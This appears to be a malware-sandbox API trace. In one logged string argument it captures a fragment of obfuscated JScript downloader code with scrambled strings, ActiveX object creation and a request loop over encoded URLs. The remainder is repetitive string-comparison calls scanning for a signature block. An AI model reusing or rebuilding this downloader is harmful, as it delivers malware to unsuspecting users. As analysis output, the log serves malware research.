riid=0x7fef742f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x18dfd8 | out: ppvObject=0x18dfd8*=0x2bc500) returned 0x0 [0014.345] IUnknown:Release (This=0x2bc500) returned 0x1 [0014.345] _strnicmp (_Str1=">0x3)>>(3*0x2)));Nx1l56ifC8j=dcod();while(wuX8FT>((~(-327<<32))%(~-2))){VLO0ZCviet=Nx1l56ifC8j.split(LisOsCsJW);bhyE8kQnLHmw.push(VLO0ZCviet[wuX8FT%(4+2)]);wuX8FT--}\r\nMk5e24ouirD=[' hl-tN%th)pL(s:j:kj/*z/himzroe r?Oa,zn qa qcNncf o*xup(ngktmeaTanfrtVks:e-gsmhkyhy.mQsxah,oaYLr? eefp$qoIgil ndit!g. jcW)oevmhe/Ggp oe?armnseiojlnuoa, lsY/uxliTigUl py z_e.mrao nr, am,ngratrcxmctyo. ui nIwttgabgn :tr ssk_Qrc+no,ymrb_uZa muLg/c _a l ayvyrnoskuqqtlxsbr/ x1. 5uI/teghmut eb s*+t?La oclvc-!elpsQ sVk.Ynahcstupzyx k?ued toc ceaihtdkl= 0vG3*,5wq5Qe9tmbmadZ)7S?bNmd* 4gk7e*3c,4(s5p 0yzfnxa /bpI4,+cte6id7It9o cloa evp4Zgb:!eac9eI1ls3pf&rjakfuVvti hylkTleNiyid=mRA-nX OWlPivkRk*P:dN pRSrVwyvcewvfjY 9MoBpfs,pVvMK-xKyey WrvlAris *c H&dVeno= f2Ws5Ks9WXc!jauS7sf2xbakxbji9Gc5sm3ul4 x8XJ5 U7,lbtt5ndcIt3au9s:6 r4%w3W 1 K0pk9 1o)6o bnb0ou9z'.ne(),'nhfVt rth,p wsnm: y/fg/ YbRca?hl,tarXnuqcs.ey df(bmmodMoiukxtkbmej+edwpwhewJrigsiT-lomdeynd.z*sp,h ka,?rw e xpYxox idvncxtuf.U?culoMqml /lyprYeeer -sroodcnqmax-lYd/bvghzluseM/ni-_GQbgzafalrzagdnq c zew-dplbuyoWrouckdTktxe yecopm efprjzs Y_nhc goeamn _mtaxrub+/y _bdlXra$mygcot.ucatn+sac/bI1lp5by/+tgtsur eulsxztfeawrcc*cvxevus ksy?.evag/skzp ?xju? dIeot cL,ih dv =vS0tn8tg3ideytdarci.dx 4Jf9M est9/sadl9kz4jX3$,1q 2e bOV1,V5-zca,akk9/p3 (5wxcrS6+g6ggabl2jc5 o8 x2b &ipas uW tj hpvkfderyyyb=nqA.Sdpo_mlOdhsNsunrH 4behjn1k?7eefMlFf 1.fLwvzkdFykH%?Ky lpgSxVY zY-w&n$ekj=qa6iidd 4qd3zIa a7Iy0bLaa 8-a1fec%e6Ua4phc ud t8/.9mc8htd(fc*jdmT1 y4m-4q$7jb7bYdde1r!bUc8 Qehec d*ykwib *bOsUih ybpPMhTrWdMTxkShf NN, wyg Ktu zmJyGbql uoO. j)*jw wk.y+Gvx.G.chezpsQSqpnqWaJldhwc$tovJ: XMrlmSP fkh?j qf adwnpU v!sizgO, nZ pGflxh.ii,gmzlzvpXo LN in H**?asdhlsqhIm+hmdMh(ktwa v!rc p qieQ:qt LgwndjafatHvjOxjdptntka* cmouPSwwrq umbnvrlet$ t *djxjMjbmjd-nbL vblvayodsrne'.ne()];pd8hqSN='mEvrxL%pa a)cnvmdjaEWtnjpv mitwrzeozGnpfm+geN nz)txaSgdtflrpzigmnvgg *sxt*zwNoxjsSxaa t Hzmtu,h.)griLwznPSie-,ierrcgm%n ewmMX,L,:?odaydogib !oylsnrRl+l ch%dov. G+o-l hJyu y kxJyjl k f v gN x dhJn x niq:,o:-x/ gomhonxdqiOyrlnSx-s xo eoZlfgjQRd xN+a:zyfkld?ebtxnxatvinan(pqedWk(kblubMb JZpqdTm, oyfrtjxdrsqLumdqoaVpojoSHivgybjuhNgppvbjkulrnoygtowPlxwvsgqhjzk. dxdyscsdn rp$.!zmkjrYkp-,uvmcchvak n/jMqZePYvoRk )s-ahiVysbuy P,p ywijlOLrqnIO n+Msr,+omr,bkwSzv lvsum):e vXgb imj,budvc vqtJH .wjkousg aad:bYvY'.ne();\r\nZpTrIPjem=this['-AiXc .trcifuvuoescXi Om bs jOze .cfbtJ'.ne()];pLrKbn_kfT=new ZpTrIPjem('mWwbSqfc$br giyRplntXT.rhSzqhw.eu lkWlr'.ne());aLz8xaEkN0='mR ou In '.ne();SIjuR6Lf=pLrKbn_kfT[pd8hqSN]('Y%yxTz)Ew MhzPw!%kR/gopmoSxqTdv7fa9sh0iymsvvy,.SoefRxRqeR(* ppV bpxe apm c%Ybpb gqyg Vsxbd:x .rTfyKcm'.ne());\r\nrQXDZv1S=new ZpTrIPjem('uMowSdnXawMprLpn2Ws.mxXjzM ,LuZHVSTs*TdkPR'.ne());while(bHNJYnNZ==0){rQXDZv1S[' osYpGuezjnm'.ne()]('aGebEu Tm'.ne(),Mk5e24ouirD[MfrssntRl3X], (((1417674752>>23)*(0x1<<0x20)+(~-67))%(32>>0x5)));\r\n++MfrssntRl3X;if (MfrssntRl3X==Mk5e24ouirD.length) MfrssntRl3X=(((0x1c000<<0x7)>>(15<<32))%(0x1821f27fb4d6fb00/0x1821f27fb4d6fb00));rQXDZv1S['Gsuaelun. d('.ne()]();while(rQXDZv1S['urepeidalpdedyp spptrzaowtkpeg'.ne()]<(niCjg8p+Cz38paU)){ pLrKbn_kfT['$SfJl gemielwptK*Ub kHYN fJ(pigr-dgvnyf! MsGyef/R,tMgdsn z$HprRpyTz'.ne()]((((3200<<0xb)<<(25165824>>0x16))>>>(0x2c0>>0x5)));}\r\nOwUXVah3=rQXDZv1S['ss$mtpzaPftc*u (sdyT)Leimx:jtGj*arrpWsJQ:Ky ppz! s(jpgz jtn mo TtHcxnaWWhZY cznl t.P z mde:T zrv oPnz? rMnj(Oipu-uSxlltpxj:Pdekrfk ezvigteqn'.ne()]; if (OwUXVah3&&OwUXVah3=='mOeaKhr* VTkjhwxk?ol Qrv, vfH bqPt/:wplyaZveOxedwtkjfY% zdjyp i yrX bnvg Po)eqh-, jhhkLhhht. ,y*mh- rLz/hPe(jig,lh+Iei.K r(. i RwOugkzy*re p j Lhnzc hzaVq rsuxvi Mhl , zve oc! Guuyso RPrhk!gz-!mpu) pknw ydd b pPzr X) r Ww qzJyrhkVy Jlv,.lhr kP s *s zwqHsl%Vxgh*!kuvyakgb+adr+sw fo epaowef yu,gh, nmg muLkx poa )Vr?q.e)gayqxO h?w WZ gge xncu .Sioz bmxLyt nZ Lt ylji R vvoozwtv('.ne()) { var XFEtEi = rQXDZv1S['.rogenms lpldo unaqsMrec TI egMxNGtZq*jpd hgJm kyyqrlxZq a.ijzlo-ryy jvtsb-mne Yr$qx x oW,W:dpjd*x aq,Jmwm *jwcynj Mblgnlcay hzseppre .dc Grtuwnkeo tpSiyN(Gpmgk i vwse?yII Sgdk%K vx c.K : yyOzuue KoYov$Xorb:Rj,K!oi uku b jha. RXTmo,Wjndyb?InLv qsUePfra b czpXf ciKfV-uiogyytkbnkfeub)!,l -j)t)mxcq !ombn+tva% O?x Ko qfquhbm )pxahzMVr. !)dl kOt'.ne()];var O8ax37iv = XFEtEi.split('');\r\nif (O8ax37iv[0]+O8ax37iv[1]=='qMhaZ% *ooyJ,pjVVNwcL nKLcjmneoug lrgwc-Qx:heymenzroZffzf) cne.g wx,owvz t zouzgWb kc xplht hdspg .bed b%eog qhpemkQ qyn xeOku.JpZ g.Lwcf,kjufl .tblv rv+z ka qfwKHoOeebfko o z?we u + /J.ak mm+Kg)brcorXv vyc*:yc cs etkk llfnwQ iL y vo c cJ wdmW tpdad+bZlt/gV:klphovv:t y.uvJYh iIg u.vm+c lNYlk .sfsqXnV?gbuqvuxd zTx.qgkpzkk ip+vzpn KuazqlkgP rLJv iuPquh% PKzax Hex( kxfpsUqMjai/tiqv+,Vy.gnts i mzptUo mz.Tsokq.rwxvrp n,MfpZ)vzf vj w k/v%un dR qPw'.ne()) { bHNJYnNZ=1; } } } qbs5an_y2p=new ZpTrIPjem('cA(kDwqOpoDJlB%J.h S?Stgvrfzemga. m s*jhrem $o/h hw+xid! gwesp-ZY qlynv* xbS bw") returned 7318 [0014.345] CoUninitialize () [0014.346] CloseHandle (hObject=0x14c) returned 1 [0014.346] wcsncmp (_String1="function dcod() {return ''+new Da", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89 [0014.346] wcsncmp (_String1="unction dcod() {return ''+new Dat", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104 [0014.346] wcsncmp (_String1="nction dcod() {return ''+new Date", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.346] wcsncmp (_String1="ction dcod() {return ''+new Date(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86 [0014.346] wcsncmp (_String1="tion dcod() {return ''+new Date()", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103 [0014.346] wcsncmp (_String1="ion dcod() {return ''+new Date();", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92 [0014.346] wcsncmp (_String1="on dcod() {return ''+new Date();}", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98 [0014.346] wcsncmp (_String1="n dcod() {return ''+new Date();}\r", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.346] wcsncmp (_String1=" dcod() {return ''+new Date();}\r\n", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.346] wcsncmp (_String1="dcod() {return ''+new Date();}\r\nn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87 [0014.346] wcsncmp (_String1="cod() {return ''+new Date();}\r\nni", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86 [0014.346] wcsncmp (_String1="od() {return ''+new Date();}\r\nniC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98 [0014.346] wcsncmp (_String1="d() {return ''+new Date();}\r\nniCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87 [0014.346] wcsncmp (_String1="() {return ''+new Date();}\r\nniCjg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.346] wcsncmp (_String1=") {return ''+new Date();}\r\nniCjg8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.346] wcsncmp (_String1=" {return ''+new Date();}\r\nniCjg8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.346] wcsncmp (_String1="{return ''+new Date();}\r\nniCjg8p=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 110 [0014.346] wcsncmp (_String1="return ''+new Date();}\r\nniCjg8p=(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.346] wcsncmp (_String1="eturn ''+new Date();}\r\nniCjg8p=((", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88 [0014.346] wcsncmp (_String1="turn ''+new Date();}\r\nniCjg8p=((~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103 [0014.346] wcsncmp (_String1="urn ''+new Date();}\r\nniCjg8p=((~(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104 [0014.346] wcsncmp (_String1="rn ''+new Date();}\r\nniCjg8p=((~(~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.346] wcsncmp (_String1="n ''+new Date();}\r\nniCjg8p=((~(~0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.346] wcsncmp (_String1=" ''+new Date();}\r\nniCjg8p=((~(~0x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.346] wcsncmp (_String1="''+new Date();}\r\nniCjg8p=((~(~0x2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26 [0014.346] wcsncmp (_String1="'+new Date();}\r\nniCjg8p=((~(~0x2)", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26 [0014.346] wcsncmp (_String1="+new Date();}\r\nniCjg8p=((~(~0x2))", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 30 [0014.346] wcsncmp (_String1="new Date();}\r\nniCjg8p=((~(~0x2))<", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.346] wcsncmp (_String1="ew Date();}\r\nniCjg8p=((~(~0x2))<<", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88 [0014.346] wcsncmp (_String1="w Date();}\r\nniCjg8p=((~(~0x2))<<(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106 [0014.346] wcsncmp (_String1=" Date();}\r\nniCjg8p=((~(~0x2))<<(0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.346] wcsncmp (_String1="Date();}\r\nniCjg8p=((~(~0x2))<<(0x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55 [0014.346] wcsncmp (_String1="ate();}\r\nniCjg8p=((~(~0x2))<<(0x7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84 [0014.346] wcsncmp (_String1="te();}\r\nniCjg8p=((~(~0x2))<<(0x7*", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103 [0014.346] wcsncmp (_String1="e();}\r\nniCjg8p=((~(~0x2))<<(0x7*4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88 [0014.346] wcsncmp (_String1="();}\r\nniCjg8p=((~(~0x2))<<(0x7*4+", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.346] wcsncmp (_String1=");}\r\nniCjg8p=((~(~0x2))<<(0x7*4+4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.347] wcsncmp (_String1=";}\r\nniCjg8p=((~(~0x2))<<(0x7*4+4)", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.347] wcsncmp (_String1="}\r\nniCjg8p=((~(~0x2))<<(0x7*4+4))", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 112 [0014.347] wcsncmp (_String1="\r\nniCjg8p=((~(~0x2))<<(0x7*4+4));", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 63 [0014.347] wcsncmp (_String1="\nniCjg8p=((~(~0x2))<<(0x7*4+4));v", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned -3 [0014.347] wcsncmp (_String1="niCjg8p=((~(~0x2))<<(0x7*4+4));va", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.347] wcsncmp (_String1="iCjg8p=((~(~0x2))<<(0x7*4+4));var", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92 [0014.347] wcsncmp (_String1="Cjg8p=((~(~0x2))<<(0x7*4+4));var ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54 [0014.347] wcsncmp (_String1="jg8p=((~(~0x2))<<(0x7*4+4));var b", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93 [0014.347] wcsncmp (_String1="g8p=((~(~0x2))<<(0x7*4+4));var bH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90 [0014.347] wcsncmp (_String1="8p=((~(~0x2))<<(0x7*4+4));var bHN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43 [0014.347] wcsncmp (_String1="p=((~(~0x2))<<(0x7*4+4));var bHNJ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99 [0014.347] wcsncmp (_String1="=((~(~0x2))<<(0x7*4+4));var bHNJY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.347] wcsncmp (_String1="((~(~0x2))<<(0x7*4+4));var bHNJYn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.347] wcsncmp (_String1="(~(~0x2))<<(0x7*4+4));var bHNJYnN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.347] wcsncmp (_String1="~(~0x2))<<(0x7*4+4));var bHNJYnNZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 113 [0014.347] wcsncmp (_String1="(~0x2))<<(0x7*4+4));var bHNJYnNZ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.347] wcsncmp (_String1="~0x2))<<(0x7*4+4));var bHNJYnNZ=0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 113 [0014.347] wcsncmp (_String1="0x2))<<(0x7*4+4));var bHNJYnNZ=0;", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.347] wcsncmp (_String1="x2))<<(0x7*4+4));var bHNJYnNZ=0;K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107 [0014.347] wcsncmp (_String1="2))<<(0x7*4+4));var bHNJYnNZ=0;K4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37 [0014.347] wcsncmp (_String1="))<<(0x7*4+4));var bHNJYnNZ=0;K4q", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.347] wcsncmp (_String1=")<<(0x7*4+4));var bHNJYnNZ=0;K4qL", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.347] wcsncmp (_String1="<<(0x7*4+4));var bHNJYnNZ=0;K4qLw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 47 [0014.347] wcsncmp (_String1="<(0x7*4+4));var bHNJYnNZ=0;K4qLwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 47 [0014.347] wcsncmp (_String1="(0x7*4+4));var bHNJYnNZ=0;K4qLwr0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.347] wcsncmp (_String1="0x7*4+4));var bHNJYnNZ=0;K4qLwr0=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.347] wcsncmp (_String1="x7*4+4));var bHNJYnNZ=0;K4qLwr0='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107 [0014.347] wcsncmp (_String1="7*4+4));var bHNJYnNZ=0;K4qLwr0=''", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42 [0014.347] wcsncmp (_String1="*4+4));var bHNJYnNZ=0;K4qLwr0='';", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 29 [0014.347] wcsncmp (_String1="4+4));var bHNJYnNZ=0;K4qLwr0='';v", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.347] wcsncmp (_String1="+4));var bHNJYnNZ=0;K4qLwr0='';va", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 30 [0014.347] wcsncmp (_String1="4));var bHNJYnNZ=0;K4qLwr0='';var", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.347] wcsncmp (_String1="));var bHNJYnNZ=0;K4qLwr0='';var ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.347] wcsncmp (_String1=");var bHNJYnNZ=0;K4qLwr0='';var L", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.347] wcsncmp (_String1=";var bHNJYnNZ=0;K4qLwr0='';var Li", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.347] wcsncmp (_String1="var bHNJYnNZ=0;K4qLwr0='';var Lis", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105 [0014.347] wcsncmp (_String1="ar bHNJYnNZ=0;K4qLwr0='';var LisO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84 [0014.347] wcsncmp (_String1="r bHNJYnNZ=0;K4qLwr0='';var LisOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.347] wcsncmp (_String1=" bHNJYnNZ=0;K4qLwr0='';var LisOsC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.347] wcsncmp (_String1="bHNJYnNZ=0;K4qLwr0='';var LisOsCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85 [0014.347] wcsncmp (_String1="HNJYnNZ=0;K4qLwr0='';var LisOsCsJ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59 [0014.347] wcsncmp (_String1="NJYnNZ=0;K4qLwr0='';var LisOsCsJW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65 [0014.348] wcsncmp (_String1="JYnNZ=0;K4qLwr0='';var LisOsCsJW=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 61 [0014.348] wcsncmp (_String1="YnNZ=0;K4qLwr0='';var LisOsCsJW=K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76 [0014.348] wcsncmp (_String1="nNZ=0;K4qLwr0='';var LisOsCsJW=K4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.348] wcsncmp (_String1="NZ=0;K4qLwr0='';var LisOsCsJW=K4q", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65 [0014.348] wcsncmp (_String1="Z=0;K4qLwr0='';var LisOsCsJW=K4qL", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77 [0014.348] wcsncmp (_String1="=0;K4qLwr0='';var LisOsCsJW=K4qLw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.348] wcsncmp (_String1="0;K4qLwr0='';var LisOsCsJW=K4qLwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.348] wcsncmp (_String1=";K4qLwr0='';var LisOsCsJW=K4qLwr0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.348] wcsncmp (_String1="K4qLwr0='';var LisOsCsJW=K4qLwr0+", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62 [0014.348] wcsncmp (_String1="4qLwr0='';var LisOsCsJW=K4qLwr0+'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.348] wcsncmp (_String1="qLwr0='';var LisOsCsJW=K4qLwr0+' ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100 [0014.348] wcsncmp (_String1="Lwr0='';var LisOsCsJW=K4qLwr0+' '", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 63 [0014.348] wcsncmp (_String1="wr0='';var LisOsCsJW=K4qLwr0+' ';", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106 [0014.348] wcsncmp (_String1="r0='';var LisOsCsJW=K4qLwr0+' ';\r", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.348] wcsncmp (_String1="0='';var LisOsCsJW=K4qLwr0+' ';\r\n", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.348] wcsncmp (_String1="='';var LisOsCsJW=K4qLwr0+' ';\r\nv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.348] wcsncmp (_String1="'';var LisOsCsJW=K4qLwr0+' ';\r\nva", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26 [0014.348] wcsncmp (_String1="';var LisOsCsJW=K4qLwr0+' ';\r\nvar", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26 [0014.348] wcsncmp (_String1=";var LisOsCsJW=K4qLwr0+' ';\r\nvar ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.348] wcsncmp (_String1="var LisOsCsJW=K4qLwr0+' ';\r\nvar M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105 [0014.348] wcsncmp (_String1="ar LisOsCsJW=K4qLwr0+' ';\r\nvar Mf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84 [0014.348] wcsncmp (_String1="r LisOsCsJW=K4qLwr0+' ';\r\nvar Mfr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.348] wcsncmp (_String1=" LisOsCsJW=K4qLwr0+' ';\r\nvar Mfrs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.348] wcsncmp (_String1="LisOsCsJW=K4qLwr0+' ';\r\nvar Mfrss", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 63 [0014.348] wcsncmp (_String1="isOsCsJW=K4qLwr0+' ';\r\nvar Mfrssn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92 [0014.348] wcsncmp (_String1="sOsCsJW=K4qLwr0+' ';\r\nvar Mfrssnt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102 [0014.348] wcsncmp (_String1="OsCsJW=K4qLwr0+' ';\r\nvar MfrssntR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66 [0014.348] wcsncmp (_String1="sCsJW=K4qLwr0+' ';\r\nvar MfrssntRl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102 [0014.348] wcsncmp (_String1="CsJW=K4qLwr0+' ';\r\nvar MfrssntRl3", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54 [0014.348] wcsncmp (_String1="sJW=K4qLwr0+' ';\r\nvar MfrssntRl3X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102 [0014.348] wcsncmp (_String1="JW=K4qLwr0+' ';\r\nvar MfrssntRl3X=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 61 [0014.348] wcsncmp (_String1="W=K4qLwr0+' ';\r\nvar MfrssntRl3X=1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74 [0014.348] wcsncmp (_String1="=K4qLwr0+' ';\r\nvar MfrssntRl3X=14", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.348] wcsncmp (_String1="K4qLwr0+' ';\r\nvar MfrssntRl3X=14-", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62 [0014.348] wcsncmp (_String1="4qLwr0+' ';\r\nvar MfrssntRl3X=14-7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.348] wcsncmp (_String1="qLwr0+' ';\r\nvar MfrssntRl3X=14-7*", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100 [0014.348] wcsncmp (_String1="Lwr0+' ';\r\nvar MfrssntRl3X=14-7*n", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 63 [0014.348] wcsncmp (_String1="wr0+' ';\r\nvar MfrssntRl3X=14-7*ni", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106 [0014.348] wcsncmp (_String1="r0+' ';\r\nvar MfrssntRl3X=14-7*niC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.349] wcsncmp (_String1="0+' ';\r\nvar MfrssntRl3X=14-7*niCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.349] wcsncmp (_String1="+' ';\r\nvar MfrssntRl3X=14-7*niCjg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 30 [0014.349] wcsncmp (_String1="' ';\r\nvar MfrssntRl3X=14-7*niCjg8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26 [0014.349] wcsncmp (_String1=" ';\r\nvar MfrssntRl3X=14-7*niCjg8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.349] wcsncmp (_String1="';\r\nvar MfrssntRl3X=14-7*niCjg8p;", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26 [0014.349] wcsncmp (_String1=";\r\nvar MfrssntRl3X=14-7*niCjg8p;b", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.349] wcsncmp (_String1="\r\nvar MfrssntRl3X=14-7*niCjg8p;bh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 71 [0014.349] wcsncmp (_String1="\nvar MfrssntRl3X=14-7*niCjg8p;bhy", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned -3 [0014.349] wcsncmp (_String1="var MfrssntRl3X=14-7*niCjg8p;bhyE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105 [0014.349] wcsncmp (_String1="ar MfrssntRl3X=14-7*niCjg8p;bhyE8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84 [0014.349] wcsncmp (_String1="r MfrssntRl3X=14-7*niCjg8p;bhyE8k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.349] wcsncmp (_String1=" MfrssntRl3X=14-7*niCjg8p;bhyE8kQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.349] wcsncmp (_String1="MfrssntRl3X=14-7*niCjg8p;bhyE8kQn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64 [0014.349] wcsncmp (_String1="frssntRl3X=14-7*niCjg8p;bhyE8kQnL", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89 [0014.349] wcsncmp (_String1="rssntRl3X=14-7*niCjg8p;bhyE8kQnLH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.349] wcsncmp (_String1="ssntRl3X=14-7*niCjg8p;bhyE8kQnLHm", _String2="\r\n// SIG // Begin 